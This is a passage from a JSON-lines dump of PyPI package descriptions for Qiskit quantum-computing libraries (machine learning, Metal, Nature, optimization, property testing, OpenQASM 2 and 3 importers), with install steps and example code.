underlying QNN automatically.In addition to the models provided directly in Qiskit Machine Learning, it has theTorchConnector,\nwhich allows users to integrate all of our quantum neural networks directly into thePyTorchopen source machine learning library. Thanks to Qiskit\u2019s gradient algorithms, this includes automatic\ndifferentiation - the overall gradients computed byPyTorchduring the backpropagation take into\naccount quantum neural networks, too. The flexible design also allows the building of connectors\nto other packages in the future.InstallationWe encourage installing Qiskit Machine Learning via the pip tool (a python package manager).pipinstallqiskit-machine-learningpipwill handle all dependencies automatically and you will always install the latest\n(and well-tested) version.If you want to work on the very latest work-in-progress versions, either to try features ahead of\ntheir official release or if you want to contribute to Machine Learning, then you can install from source.\nTo do this follow the instructions in thedocumentation.Optional InstallsPyTorch, may be installed either using commandpip install 'qiskit-machine-learning[torch]'to install the\npackage or refer to PyTorchgetting started. When PyTorch\nis installed, theTorchConnectorfacilitates its use of quantum computed networks.Sparse, may be installed using commandpip install 'qiskit-machine-learning[sparse]'to install the\npackage. 
Sparse being installed will enable the usage of sparse arrays/tensors.Creating Your First Machine Learning Programming Experiment in QiskitNow that Qiskit Machine Learning is installed, it's time to begin working with the Machine Learning module.\nLet's try an experiment using VQC (Variational Quantum Classifier) algorithm to\ntrain and test samples from a data set to see how accurately the test set can\nbe classified.fromqiskit.circuit.libraryimportTwoLocal,ZZFeatureMapfromqiskit_algorithms.optimizersimportCOBYLAfromqiskit_algorithms.utilsimportalgorithm_globalsfromqiskit_machine_learning.algorithmsimportVQCfromqiskit_machine_learning.datasetsimportad_hoc_dataseed=1376algorithm_globals.random_seed=seed# Use ad hoc data set for training and test datafeature_dim=2# dimension of each data pointtraining_size=20test_size=10# training features, training labels, test features, test labels as np.ndarray,# one hot encoding for labelstraining_features,training_labels,test_features,test_labels=ad_hoc_data(training_size=training_size,test_size=test_size,n=feature_dim,gap=0.3)feature_map=ZZFeatureMap(feature_dimension=feature_dim,reps=2,entanglement=\"linear\")ansatz=TwoLocal(feature_map.num_qubits,[\"ry\",\"rz\"],\"cz\",reps=3)vqc=VQC(feature_map=feature_map,ansatz=ansatz,optimizer=COBYLA(maxiter=100),)vqc.fit(training_features,training_labels)score=vqc.score(test_features,test_labels)print(f\"Testing accuracy:{score:0.2f}\")Further examplesLearning path notebooks may be found in theMachine Learning tutorialssection\nof the documentation and are a great place to start.Another good place to learn the fundamentals of quantum machine learning is theQuantum Machine Learningcourse\non the Qiskit Textbook's website. The course is very convenient for beginners who are eager to learn\nquantum machine learning from scratch, as well as understand the background and theory behind algorithms in\nQiskit Machine Learning. The course covers a variety of topics to build understanding of parameterized\ncircuits, data encoding, variational algorithms etc., and in the end the ultimate goal of machine\nlearning - how to build and train quantum ML models for supervised and unsupervised learning.\nThe textbook course is complementary to the tutorials of this module, where the tutorials focus\non actual Qiskit Machine Learning algorithms, the course more explains and details underlying fundamentals\nof quantum machine learning.Contribution GuidelinesIf you'd like to contribute to Qiskit, please take a look at ourcontribution guidelines.\nThis project adheres to Qiskit'scode of conduct.\nBy participating, you are expected to uphold this code.We useGitHub issuesfor tracking requests and bugs. 
Pleasejoin the Qiskit Slack communityand for discussion and simple questions.\nFor questions that are more suited for a forum, we use theQiskittag inStack Overflow.Authors and CitationMachine Learning was inspired, authored and brought about by the collective work of a team of researchers.\nMachine Learning continues to grow with the help and work ofmany people, who contribute\nto the project at different levels.\nIf you use Qiskit, please cite as per the providedBibTeX file.LicenseThis project uses theApache License 2.0."} +{"package": "qiskit-metal", "pacakge-description": "Qiskit MetalQiskit Metal is an open-source framework for engineers and scientists to design superconducting quantum devices with ease.InstallationIf you are interested in customizing your experience, or if you are unable to install qiskit-metal using thepip installinstructions below, consider installing directly the source code, following the instructions in thedocumentationand/or theinstallation instructions for developers.For normal use, please continue reading.The Qiskit Metal deployed packageYou can install Qiskit Metal via the pip tool (a python package manager).pipinstallqiskit-metalPIP will handle most of the dependencies automatically and you will always install the latest (and well-tested) version of the package.Some of the dependencies, namely pyside2 and geopandas, might require manual installation, depending on your specific system compatibility. If you encounter installation or execution errors, please refer first to theFAQ.We recommend to install qiskit-metal in a conda environment or venv, to prevent version conflicts with pre-existing package versions.Jupyter NotebookAt this time, we recommend using Jupyter notebook/lab to be able to access all the Qiskit Metal features. Jupyter is not installed with the default dependencies, to accommodate those users intending to utilize a centralized or customized installation.If you require a fresh installation, please refer to eitheranaconda.orgorjupyter.org.Unless you installed the entirejupyterpackage in your current environment, do not forget to create the appropriate kernel to make the environment (thus qiskit-metal) available to jupyter (instructions in theFAQ)Creating Your First Quantum Component in Qiskit Metal:Now that Qiskit Metal is installed, it's time to begin working with it.\nWe are ready to try out a quantum chip example, which is simulated locally using\nthe Qiskit MetalGUI element. 
This is a simple example that makes a qubit.$ python>>>fromqiskit_metalimportdesigns,draw,MetalGUI,Dict,open_docs>>>design=designs.DesignPlanar()>>>design.overwrite_enabled=True>>>design.chips.main>>>design.chips.main.size.size_x='11mm'>>>design.chips.main.size.size_y='9mm'>>>gui=MetalGUI(design)Launch the Qiskit Metal GUI to interactively view, edit, and simulate a QDesign:>>>gui=MetalGUI(design)Let's create a new qubit (a transmon) by creating an object of this class.>>>fromqiskit_metal.qlibrary.qubits.transmon_pocketimportTransmonPocket>>>q1=TransmonPocket(design,'Q1',options=dict(connection_pads=dict(a=dict())))>>>gui.rebuild()>>>gui.edit_component('Q1')>>>gui.autoscale()Change options.>>>q1.options.pos_x='0.5 mm'>>>q1.options.pos_y='0.25 mm'>>>q1.options.pad_height='90um'>>>q1.options.pad_width='455um'>>>q1.options.pad_gap='30 um'Update the component geometry after changing the options.>>>gui.rebuild()Get a list of all the qcomponents in QDesign and then zoom on them.>>>all_component_names=design.components.keys()>>>gui.zoom_on_components(all_component_names)Closing the Qiskit Metal GUI.>>>gui.main_window.close()A script is availablehere, where we also show the overview of Qiskit Metal.Community and SupportWatch the recorded tutorialsThe streaming will also be recorded and made availableherefor offline review.Take part in the live tutorials and discussionThrough June 2021 we are offering live tutorials and Q&A.Sign upto receive an invite to the upcoming sessions. The streaming will also be recorded and made available for offline review. Findheremore details on schedule and use the Slack channel to give us feedback and to request the most relevant content to you.Get help: SlackUse the slack channel. Joinqiskit slackand then join the#metalchannel to communicate with the developers and other participants. You may also use this channel to inquire about collaborations.Contribution GuidelinesIf you'd like to contribute to Qiskit Metal, please take a look at ourcontribution guidelines. This project adheres to Qiskit'scode of conduct. By participating, you are expected to uphold this code.\nWe useGitHub issuesfor tracking requests and bugs. Pleasejoin the Qiskit Slack communityand use ourQiskit Slack channelfor discussion and simple questions.\nFor questions that are more suited for a forum we use the Qiskit tag in theStack Exchange.Next StepsNow you're set up and ready to check out some of the other examples from ourQiskit Metal Tutorialsrepository orQiskit Metal Documentation.Authors and CitationQiskit Metal is the work ofmany peoplewho contribute to the project at different levels. Metal was conceived and developed byZlatko Minevat IBM; then co-led with Thomas McConkey. If you use Qiskit Metal, please cite as per the includedBibTeX file. For icon attributions, seehere.Changelog and Release NotesThe changelog provides a quick overview of notable changes for a given release.The changelog for a particular release can be found in the correspondent Github release page. For example, you can find the changelog for the0.0.4releasehereThe changelog for all releases can be found in the release page:Additionally, as part of each release detailed release notes are written to document in detail what has changed as part of a release. 
This includes any documentation on potential breaking changes on upgrade and new features.LicenseApache License 2.0"} +{"package": "qiskit-nature", "pacakge-description": "Qiskit NatureQiskit Natureis an open-source framework which supports solving quantum mechanical natural\nscience problems using quantum computing algorithms. This includes finding ground and excited\nstates of electronic and vibrational structure problems, measuring the dipole moments of molecular\nsystems, solving the Ising and Fermi-Hubbard models on lattices, and much more.The code comprises various modules revolving around:data loading from chemistry drivers or file formatssecond-quantized operator construction and manipulationtranslating from the second-quantized to the qubit spacea quantum circuit library of natural science targeted ansatzenatural science specific algorithms and utilities to make the use of\nalgorithms fromQiskit Algorithmseasierand much moreInstallationWe encourage installing Qiskit Nature via the pip tool (a python package manager).pipinstallqiskit-naturepipwill handle all dependencies automatically and you will always install the latest\n(and well-tested) version.If you want to work on the very latest work-in-progress versions, either to try features ahead of\ntheir official release or if you want to contribute to Qiskit Nature, then you can install from source.\nTo do this follow the instructions in thedocumentation.Optional InstallsTo run chemistry experiments using Qiskit Nature, it is recommended that you install\na classical computation chemistry software program/library interfaced by Qiskit.\nSeveral, as listed below, are supported, and while logic to interface these programs is supplied by\nQiskit Nature via the above pip installation, the dependent programs/libraries themselves need\nto be installed separately.Gaussian 16\u2122, a commercial chemistry programPSI4, a chemistry program that exposes a Python interface allowing for accessing internal objectsPySCF, an open-source Python chemistry programThe above codes can be used in a very limited fashion through Qiskit Nature.\nWhile this is useful for getting started and testing purposes, a better experience can be had in the reversed order of responsibility.\nThat is, in a setup where the classical code runs the Qiskit Nature components.\nSuch an integration currently exists for the following packages:PySCF viaqiskit-nature-pyscfIf you are interested in using Psi4, we are actively looking for help to get started on a similar integration inqiskit-nature-psi4.Additionally, you may find the following optional dependencies useful:sparse, a library for sparse multi-dimensional arrays. When installed, Qiskit Nature can leverage this to reduce the memory requirements of your calculations.opt_einsum, a tensor contraction order optimizer fornp.einsum.Creating Your First Chemistry Programming Experiment in QiskitCheck ourgetting started pagefor a first example on how to use Qiskit Nature.Further examplesLearning path notebooks may be found in theNature Tutorialssection\nof the documentation and are a great place to start.Contribution GuidelinesIf you'd like to contribute to Qiskit, please take a look at ourcontribution guidelines.\nThis project adheres to Qiskit'scode of conduct.\nBy participating, you are expected to uphold this code.We useGitHub issuesfor tracking requests and bugs. 
Pleasejoin the Qiskit Slack communityfor discussion and simple questions.\nFor questions that are more suited for a forum, we use theQiskittag inStack Overflow.Authors and CitationQiskit Nature was inspired, authored and brought about by the collective work of a team of researchers.\nQiskit Nature continues to grow with the help and work ofmany people, who contribute\nto the project at different levels.\nIf you use Qiskit Nature, please cite the following references:Qiskit, as per the providedBibTeX file.Qiskit Nature, as perhttps://doi.org/10.5281/zenodo.7828767LicenseThis project uses theApache License 2.0.However there is some code that is included under other licensing as follows:TheGaussian 16 driverinqiskit-naturecontainsworklicensed under theGaussian Open-Source Public License."} +{"package": "qiskit-nature-pyscf", "pacakge-description": "Qiskit Nature PySCFQiskit Nature PySCFis a third-party integration plugin of Qiskit Nature + PySCF.InstallationWe encourage installing Qiskit Nature PySCF via the pip tool (a python package manager).pipinstallqiskit-nature-pyscfpipwill handle all dependencies automatically and you will always install the latest\n(and well-tested) version. It will also install Qiskit Nature if needed.If you want to work on the very latest work-in-progress versions, either to try features ahead of\ntheir official release or if you want to contribute to Qiskit Nature PySCF, then you can install from source.UsageThis plugin couples the APIs of PySCF and Qiskit Nature, enabling a user of PySCF to leverage\nQuantum-based algorithms implemented in Qiskit to be used in-place of their classical counterparts.Active Space CalculationsOne very common approach is to use a Quantum algorithm to find the ground state in an active space\ncalculation. To this extent, this plugin provides theQiskitSolverclass, which you can inject\ndirectly into yourCASCIorCASSCFsimulation objects of PySCF.Below we show a simple example of how to do this.frompyscfimportgto,scf,mcscfimportnumpyasnpfromqiskit.primitivesimportEstimatorfromqiskit_algorithmsimportVQEfromqiskit_algorithms.optimizersimportSLSQPfromqiskit_nature.second_q.algorithmsimportGroundStateEigensolverfromqiskit_nature.second_q.circuit.libraryimportHartreeFock,UCCSDfromqiskit_nature.second_q.mappersimportParityMapperfromqiskit_nature_pyscfimportQiskitSolvermol=gto.M(atom=\"Li 0 0 0; H 0 0 1.6\",basis=\"sto-3g\")h_f=scf.RHF(mol).run()norb=2nalpha,nbeta=1,1nelec=nalpha+nbetacas=mcscf.CASCI(h_f,norb,nelec)mapper=ParityMapper(num_particles=(nalpha,nbeta))ansatz=UCCSD(norb,(nalpha,nbeta),mapper,initial_state=HartreeFock(norb,(nalpha,nbeta),mapper,),)vqe=VQE(Estimator(),ansatz,SLSQP())vqe.initial_point=np.zeros(ansatz.num_parameters)algorithm=GroundStateEigensolver(mapper,vqe)cas.fcisolver=QiskitSolver(algorithm)cas.run()More detailed information for this plugin can be found in itsDocumentation. 
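As a small variation on the snippet above (a sketch only, not taken from the plugin's documentation): since the description states that QiskitSolver can be injected into CASSCF objects as well as CASCI, the same solver instance can be reused, for example:

# Assumes h_f, norb, nelec and algorithm exactly as defined in the CASCI example above.
from pyscf import mcscf

casscf = mcscf.CASSCF(h_f, norb, nelec)
casscf.fcisolver = QiskitSolver(algorithm)  # same quantum ground-state solver, now inside an orbital-optimizing CASSCF loop
casscf.run()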
For further\ninformation and explanations we recommend to check out the documentation ofPySCFandQiskit Nature.CitationIf you use this plugin, please cite the following references:PySCF, as perthese instructions.Qiskit, as per the providedBibTeX file.Qiskit Nature, as perhttps://doi.org/10.5281/zenodo.7828767"} +{"package": "qiskit-optimization", "pacakge-description": "Qiskit OptimizationQiskit Optimizationis an open-source framework that covers the whole range from high-level modeling of optimization\nproblems, with automatic conversion of problems to different required representations, to a suite\nof easy-to-use quantum optimization algorithms that are ready to run on classical simulators,\nas well as on real quantum devices via Qiskit.The Optimization module enables easy, efficient modeling of optimization problems usingdocplex.\nA uniform interface as well as automatic conversion between different problem representations\nallows users to solve problems using a large set of algorithms, from variational quantum algorithms,\nsuch as the Quantum Approximate Optimization Algorithm QAOA, to Grover Adaptive Search using the\nGroverOptimizer, leveraging fundamental algorithms provided byQiskit Algorithms. Furthermore, the modular design\nof the optimization module allows it to be easily extended and facilitates rapid development and\ntesting of new algorithms. Compatible classical optimizers are also provided for testing,\nvalidation, and benchmarking.InstallationWe encourage installing Qiskit Optimization via the pip tool (a python package manager).pipinstallqiskit-optimizationpipwill handle all dependencies automatically and you will always install the latest\n(and well-tested) version.If you want to work on the very latest work-in-progress versions, either to try features ahead of\ntheir official release or if you want to contribute to Optimization, then you can install from source.\nTo do this follow the instructions in thedocumentation.Optional InstallsIBM CPLEXmay be installed usingpip install 'qiskit-optimization[cplex]'to enable the reading ofLPfiles and the usage of\ntheCplexOptimizer, wrapper forcplex.Cplex. CPLEX is a separate package and its support of Python versions is independent of Qiskit Optimization, where this CPLEX command will have no effect if there is no compatible version of CPLEX available (yet).CVXPYmay be installed using the commandpip install 'qiskit-optimization[cvx]'.\nCVXPY being installed will enable the usage of the Goemans-Williamson algorithm as an optimizerGoemansWilliamsonOptimizer.Matplotlibmay be installed using the commandpip install 'qiskit-optimization[matplotlib]'.\nMatplotlib being installed will enable the usage of thedrawmethod in the graph optimization application classes.Gurobipymay be installed using the commandpip install 'qiskit-optimization[gurobi]'.\nGurobipy being installed will enable the usage of the GurobiOptimizer.Creating Your First Optimization Programming Experiment in QiskitNow that Qiskit Optimization is installed, it's time to begin working with the optimization module.\nLet's try an optimization experiment to compute the solution of aMax-Cut. 
The Max-Cut problem can be formulated as\nquadratic program, which can be solved using many several different algorithms in Qiskit.\nIn this example, the MinimumEigenOptimizer\nis employed in combination with the Quantum Approximate Optimization Algorithm (QAOA) as minimum\neigensolver routine.fromdocplex.mp.modelimportModelfromqiskit_optimization.algorithmsimportMinimumEigenOptimizerfromqiskit_optimization.translatorsimportfrom_docplex_mpfromqiskit.primitivesimportSamplerfromqiskit_algorithms.utilsimportalgorithm_globalsfromqiskit_algorithmsimportQAOAfromqiskit_algorithms.optimizersimportSPSA# Generate a graph of 4 nodesn=4edges=[(0,1,1.0),(0,2,1.0),(0,3,1.0),(1,2,1.0),(2,3,1.0)]# (node_i, node_j, weight)# Formulate the problem as a Docplex modelmodel=Model()# Create n binary variablesx=model.binary_var_list(n)# Define the objective function to be maximizedmodel.maximize(model.sum(w*x[i]*(1-x[j])+w*(1-x[i])*x[j]fori,j,winedges))# Fix node 0 to be 1 to break the symmetry of the max-cut solutionmodel.add(x[0]==1)# Convert the Docplex model into a `QuadraticProgram` objectproblem=from_docplex_mp(model)# Run quantum algorithm QAOA on qasm simulatorseed=1234algorithm_globals.random_seed=seedspsa=SPSA(maxiter=250)sampler=Sampler()qaoa=QAOA(sampler=sampler,optimizer=spsa,reps=5)algorithm=MinimumEigenOptimizer(qaoa)result=algorithm.solve(problem)print(result.prettyprint())# prints solution, x=[1, 0, 1, 0], the cost, fval=4Further examplesLearning path notebooks may be found in theoptimization tutorialssection\nof the documentation and are a great place to start.Contribution GuidelinesIf you'd like to contribute to Qiskit, please take a look at ourcontribution guidelines.\nThis project adheres to Qiskit'scode of conduct.\nBy participating, you are expected to uphold this code.We useGitHub issuesfor tracking requests and bugs. 
Pleasejoin the Qiskit Slack communityand for discussion and simple questions.\nFor questions that are more suited for a forum, we use theQiskittag inStack Overflow.Authors and CitationOptimization was inspired, authored and brought about by the collective work of a team of researchers.\nOptimization continues to grow with the help and work ofmany people, who contribute\nto the project at different levels.\nIf you use Qiskit, please cite as per the providedBibTeX file.LicenseThis project uses theApache License 2.0."} +{"package": "qiskit-pqcee-provider", "pacakge-description": "qiskit-pqcee-providerThe Qiskit provider for pQCee blockchain quantum simulatorInstallpip install qiskit-pqcee-providerUsageimportqiskitfromqiskit_pqcee_providerimportPqceeProviderprovider=PqceeProvider()backend=provider.get_backend('pqcee_simulator')qc=qiskit.QuantumCircuit(2)qc.h(0)qc.cx(0,1)qc.measure_all()job=backend.run(qc,shots=10)result=job.result()print(result.get_counts())"} +{"package": "qiskit-ptesting", "pacakge-description": "Qiskit-PTestingThis project aims to implement property-based testing for quantum circuits using the qiskit library for Python 3.6+.To learn more about qiskit, follow thislink.I also recommend followingtheir tutorials on quantum computing.To learn more about property-based testing in general, follow these ressources:Intro to property based testing,Wikipedia page.InstallationRunpip install qiskit-ptestingin a terminal environementIn any python file where you want to define property tests, add:fromQiskit_PTesting.Qiskit_PTestingimportQiskitPropertyTest,TestProperty,QargThat's it, you should be able to define tests in the same file.UsageCreate a superclass of \"QiskitPropertyTest\" using any name you wantIn that class, define 3 functions (optionally leave them out for default behaviour):property(self)quantumFunction(self, qc)assertions(self)Inside of the functionproperty(), define a TestProperty object and return itInside of the functionquantumFunction(), define which steps are needed to be applied to qc (the quantum circuit). 
All of the generated tests will have those operations applied.Inside of the functionassertion(), define which properties you would like to hold true using the built-in assertions.Run the test class you created using the \"runTests()\" method.How to define a TestPropertyA TestProperty object contains all of the necessary information to generate random tests.It contains:p_value: The p_value for all tests (float between 0 and 1)nbTests: The number of randomly generated tests (int greater than 0)nbTrials: The number of times each generated test will be run, otherwise called the amount of trials (int greater than 0)nbMeasurement: The number of times each trial will be measured (int greater than 0)nbQubits: The amount of required qubits for each test (int greater than 0, or a list of 2 integers, the 2nd one being greater of equal to the first)nbClassicalBits: The amount of classical bits required for each test(int greater or equal to 0)qargs: A dictionary of Qarg objects for each qubit that you want to initialise to a specific range/value (can be empty)backend: A string that expresses which backend should be used for the measurements.\nIt can be any backend from Aer or\"ibmq\", which automatically uses the API token stored on the computer.These are the default values:testProperty=TestProperty(p_value=0.01,nbTests=10,nbTrials=100,nbMeasurements=500,nbQubits=5,nbClassicalBits=0,qargs={},backend=\"aer_simulator\")NbQubits can be an integer or a list.\nIn that case, the framework will generate each test with a random amount of qubits between the two specified values.How to initalise a QargA Qarg object holds 4 ints that define 2 ranges.\nA test property will apply this Qarg to initialise a qubit to a random value between those 2 ranges.\nAny qubit of a quantum circuit can be initilised using 2 values: a theta and a phi.\nThe first range specifies what values theta can be used to initialise a qubit.\nThe second range specifies what values phi can take.Here is an example Qarg, that specifies that a qubit needs to be initialised with w theta between 0 and 90 degrees, and a phi of 40 to 60 degrees:qarg=Qarg(0,90,45,60)The same Qarg can be specified using radians, if the last paramter, isRad, is set to True:frommathimportpiqarg=Qarg(0,pi/2,pi/4,pi/3,True)A Qarg can also be specified with a statevector with two complex values in the following way:frommathimportsqrtqarg=Qarg([1/sqrt(2),1/sqrt(2)],[10,10],False)The above code initialises a qubit to the state |+>.\nThe second argument specifies that the theta can be up to 10 degrees higher or lower than the specified statevector, and same for the phi.\nThe False means that degrees are used instead of radians.Finally, some common states can be directly initialised with just one string:Qarg(\"0\") initialises to state 0Qarg(\"1\") to state 1Qarg(\"+\") to state +Qarg(\"-\") to state -Qarg(\"Any\") to any state on the Bloch sphereAssertions6 assertions are up to your disposition:Single-Qubit assertionsAssert the probability of a qubit to be in state |0>assertProbability(qu0,expectedProba,qu0_pre=False,basis=\"z\",filter_qc=None)assertNotProbability(qu0,expectedProba,qu0_pre=False,basis=\"z\",filter_qc=None)This assertion requires 2 arguments: first, the index of the qubit to be tested, and secondly the expected probability of measuring the qubit in the state |0> along the Z-axis.\nIt can also optionally take in an extra bool argument, that specifies whether the sampling will occur before the quantumFunction is applied.\nIt defaults to False, so the sampling 
occurs after the function.Assert that a qubit is in a given stateassertState(qu0,theta,phi,isRadian=False,qu0_pre=False,filter_qc=None)assertNotState(qu0,theta,phi,isRadian=False,qu0_pre=False,filter_qc=None)Assert that a qubit has teleported into anotherassertTeleported(sent,received,basis=\"z\",filter_qc=None)assertNotTeleported(sent,received,basis=\"z\",filter_qc=None)This assertion requires 2 positional arguments: a sent and a received qubit.\nIt evaluates whether quantum teleportation has occurred between the qubits.Multi-Qubit AssertionsAssert the equality or inequality of qubits:assertEqual(qu0,qu1,qu0_pre=False,qu1_pre=False,basis=\"z\",filter_qc=None)assertNotEqual(qu0,qu1,qu0_pre=False,qu1_pre=False,basis=\"z\",filter_qc=None)This assertion requires 2 arguments, which are the indexes of the qubits to be tested, and 2 optional arguments that specify whether the qubits are to be tested before the quantumFunction() is applied.\nIt defaults to False, so if no arguments are specified there, it will compare the qubits after the function is applied.\nThis assertion tests whether the probabilities of measuring two qubits in the states |0> or |1> are the same.\nThe tests are done on the Z-axis.Assert that two qubits are entangledassertEntangled(qu0,qu1,basis=\"z\",filter_qc=None)assertNotEntangled(qu0,qu1,basis=\"z\",filter_qc=None)This assertion requires 2 positional arguments which are the indexes of qubits.\nThis assertion evaluates whether those two input qubits are entangled.Assert The Most Common Output(s) Of The CircuitassertMostCommon(output,filter_qc=None)This assertion takes in one required positional argument: a string or a list of strings showing the most common states of a circuitFeaturesMeasure qubit values before the quantum algorithmBy specifying the boolean parameters \"qu0_pre\" or \"qu1_pre\" to be True, it is possible to tell the framework to measure the specified qubit values before or after running the quantum function\nThis is useful in many cases, for example ensuring that a qubit has changed values, or that a qubit is in the same state as another, etc...An example of using this would be:classexample(QiskitPropertyTest):defproperty(self):returnTestProperty(nbQubits=2,qargs={0:Qarg(\"0\"),1:Qarg(\"+\")})defquantumFunction(self,qc):qc.h(0)defassertions(self):#compares the qubits after the quantumFunction is runself.assertEqual(0,1)#compares both qubits beforeself.assertNotEqual(0,1,qu0_pre=True,qu1_pre=True)#compares qubit 0 after quantumFunction to qubit 1 beforeself.assertEqual(0,1,qu0_pre=False,qu1_pre=True)Filter generated testsIt is possible to apply a certain assertion to only the generated tests that have a certain attribute.\nThat attribute can be ANY function that returns a boolean and that takes a QuantumCircuit as input.\nThis feature can give a lot of depth to the defined tests, and enables the users to give very general properties about the input program.Here is an example of a use case of this feature: enabling properties on tests of any length:fromQiskit_PTesting.Qiskit_PTestingimportQiskitPropertyTest,TestProperty,Qargmin,max=(2,10)classexample(QiskitPropertyTest):defproperty(self):returnTestProperty(nbQubits=[min,max])defquantumFunction(self,qc):forindexinrange(len(qc.qubits)):qc.h(index)defassertions(self):#specifies that all the qubits should be equal to each otherforindexinrange(max):self.assertEqual(0,index,filter_qc=lambdaqc:len(qc.qubits)>index)example().run()Change The Backend Used For The MeasurementsAer SimulatorsThe default simulator
isaer_simulator, but all Aer simulators are available to choose.\nSimply pass downbackend=\"\"replacing the string with your chosen backend.Run Tests On Quantum ComputersIn order to run the code on quantum comupters, you have to create an IBMQ account, and specify in the testPropertybackend=\"ibmq\"Create an account withIBMQand loginCopy the API key found in the settings panel of the \"My Account\" section of the websiteRun the following python code:fromqiskitimportIBMQIBMQ.save_account(\"\")ExamplesfromQiskit_PTesting.Qiskit_PTestingimportQiskitPropertyTest,TestProperty,Qargclassexample(QiskitPropertyTest):defproperty(self):returnTestProperty(nbQubits=2,qargs={0:Qarg(\"0\"),1:Qarg(\"+\")})defquantumFunction(self,qc):qc.h(0)defassertions(self):self.assertEqual(0,1)example().run()Inner-workings of the frameworkThere are 4 main parts in this project:Test case generatorTest execution engineStatistical analysis engineProgramming interface"} +{"package": "qiskit-qasm2", "pacakge-description": "Importer from OpenQASM 2 to QiskitThis repository provides the Python packageqiskit_qasm2, which provides a\nfast parser of OpenQASM 2 into Qiskit'sQuantumCircuit. It is often 10x or\nmore faster than Qiskit's native parser. The API is simple:qiskit_qasm2.loadtakes a filename, and returnsQuantumCircuit;qiskit_qasm2.loadstakes an OpenQASM 2 program in a string, and returnsQuantumCircuit.The full documentation is published tohttps://jakelishman.github.io/qiskit-qasm2.A simple parsing example:importqiskit_qasm2program=\"\"\"OPENQASM 2.0;include \"qelib1.inc\";qreg q[2];creg c[2];h q[0];cx q[0], q[1];measure q -> c;\"\"\"qiskit_qasm2.loads(program).draw()\u250c\u2500\u2500\u2500\u2510 \u250c\u2500\u2510\nq_0: \u2524 H \u251c\u2500\u2500\u25a0\u2500\u2500\u2524M\u251c\u2500\u2500\u2500\n \u2514\u2500\u2500\u2500\u2518\u250c\u2500\u2534\u2500\u2510\u2514\u2565\u2518\u250c\u2500\u2510\nq_1: \u2500\u2500\u2500\u2500\u2500\u2524 X \u251c\u2500\u256b\u2500\u2524M\u251c\n \u2514\u2500\u2500\u2500\u2518 \u2551 \u2514\u2565\u2518\nc: 2/\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2569\u2550\u2550\u2569\u2550\n 0 1FeaturesThe parser supports all ofthe OpenQASM 2\nspecification,\nincluding:register definitions and usage (qregandcreg);theqelib1.incas a special builtin include, precisely as described in the\npaper;general includes, with an option to specify the search path;customgateandopaquedeclarations;gate, measurement and reset broadcasting;conditioned gate applications, measurements and reset;constant folding with the scientific calculator functions in gate parameter\nlists;mathematical expressions on parameters within custom gate bodies.In addition, the parser also includes options to:modify the search path forincludestatements in OpenQASM 2;define overrides for how some named OpenQASM 2 gate applications should be\nconverted into Qiskit form;define new builtin quantum instructions for OpenQASM 2;define new builtin classical scientific-calculator functions.Qiskit's builtin parser makes some extra-spec additions by default, with no\noption to disable them. This mostly takes the form of custom gate overrides,\nand various additional gates in Terra's vendored version ofqelib1.inccompared to the description in the paper. 
This parser is more type-safe than\nQiskit's, but does includea compatibility modeto ease the transition from using Qiskit's parser.InstallationInstall the latest release of theqiskit_qasm2package from pip:pipinstallqiskit_qasm2DevelopingIf you're looking to contribute to this project, please first readour contributing guidelines.Set up your development environment by installing the development requirements\nwith pip:pipinstall-rrequirements-dev.txttoxThis installs a few more packages than the dependencies of the package at\nruntime, because there are some tools we use for testing also included, such astoxandpytest.You will also need a working Rust toolchain. The easiest way to install one isby using rustupon Linux, macOS or Windows.After the development requirements are installed, you can install an editable\nversion of the package withpipinstall-e.After this, any changes you make to the library code will immediately be present\nwhen you open a new Python interpreter session.This package was mostly an excuse for me to learn a bit more about how lexers\nare written at a low level. This is why the Rust crate doesn't use any\nlexer-generation libraries. You can read a bit more about the architecture and\nsome of the design decisions inthe developer section of the\ndocumentation.Building documentationAfter the development requirements have been installed, the commandtox-edocswill build the HTML documentation, and place it indocs/_build/html. The\ndocumentation state of themainbranch of this repository is published tohttps://jakelishman.github.io/qiskit-qasm2.Code style and lintingThe Python components of this repository are formatted usingblack, and the\nRust components withrustfmt. You can run these on the required files by\nrunningtox-estyleThe full lint suite can be run withtox-elintLicenseThis project is licensed underversion 2.0 of the Apache License."} +{"package": "qiskit-qasm3-import", "pacakge-description": "Importer from OpenQASM 3 to QiskitThis repository provides the Python packageqiskit_qasm3_import, which is a\nbasic and temporary importer from OpenQASM 3 into Qiskit'sQuantumCircuit.Qiskit itself accepts this package as an optional dependency if it is installed.\nIn that case, Qiskit exposes the functionsqiskit.qasm3.loadandqiskit.qasm3.loads, which are wrappers aroundqiskit_qasm3_import.parse.\nThis project is a stop-gap measure until various technical decisions can be\nresolved the correct way; Terra makes strong guarantees of stability and support\nin its interfaces, and we are not yet ready to make that commitment for this\nproject, hence the minimal wrappers.ExampleThe principal entry point to the package is the top-levelparsefunction,\nwhich accepts a string containing a complete OpenQASM 3 programme. 
This complex\nexample shows a lot of the capabilities of the importer.OPENQASM 3.0;\n// The 'stdgates.inc' include is supported, and the gates are only available\n// if it has correctly been included.\ninclude \"stdgates.inc\";\n\n// Parametrised inputs are supported.\ninput float[64] a;\n\nqubit[3] q;\nbit[2] mid;\nbit[3] out;\n\n// Aliasing and re-aliasing are supported.\nlet aliased = q[0:1];\n\n// Parametrised gates that make use of the stdlib.\ngate my_gate(a) c, t {\n gphase(a / 2);\n ry(a) c;\n cx c, t;\n}\n\n// Gate modifiers work as well; this gate is equivalent to `p(-a) c;`.\ngate my_phase(a) c {\n ctrl @ inv @ gphase(a) c;\n}\n\n// We handle mathematical expressions on gate creation and complex indexing\n// of temporary collections.\nmy_gate(a * 2) aliased[0], q[{1, 2}][0];\nmeasure q[0] -> mid[0];\nmeasure q[1] -> mid[1];\n\nwhile (mid == \"00\") {\n reset q[0];\n reset q[1];\n my_gate(a) q[0], q[1];\n // We support the builtin mathematical symbols.\n my_phase(a - pi/2) q[1];\n mid[0] = measure q[0];\n mid[1] = measure q[1];\n}\n\n// The condition resolver can also handle simple cases that don't look\n// _exactly_ like equality conditions.\nif (mid[0]) {\n // There is limited support for aliasing within nested scopes.\n let inner_alias = q[{0, 1}];\n reset inner_alias;\n}\n\nout = measure q;Assuming this program is stored as a string in a variableprogram, we then\nimport it into aQuantumCircuitby doing:fromqiskit_qasm3_importimportparsecircuit=parse(program)circuitis now a completeQuantumCircuit, so we can see exactly what it\nturned into:circuit.draw()\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\u250c\u2500\u2510 